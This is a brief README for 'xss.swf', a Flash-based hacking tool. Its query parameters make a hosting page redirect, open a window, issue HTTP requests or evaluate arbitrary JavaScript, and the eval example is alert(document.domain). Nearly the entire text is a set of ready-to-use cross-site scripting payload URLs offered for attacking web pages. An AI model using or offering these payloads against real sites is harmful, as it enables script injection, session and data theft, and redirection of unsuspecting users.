xss.swf
a tiny tool for swf hacking, just browse it:)
param&value: a(action) - c(cmd)
- location to url: xss.swf?a=location&c=http://www.google.com/
- open url to new window: xss.swf?a=open&c=http://www.google.com/
- http request to url: xss.swf?a=get&c=http://www.google.com/
- eval js codz: xss.swf?a=eval&c=alert(document.domain)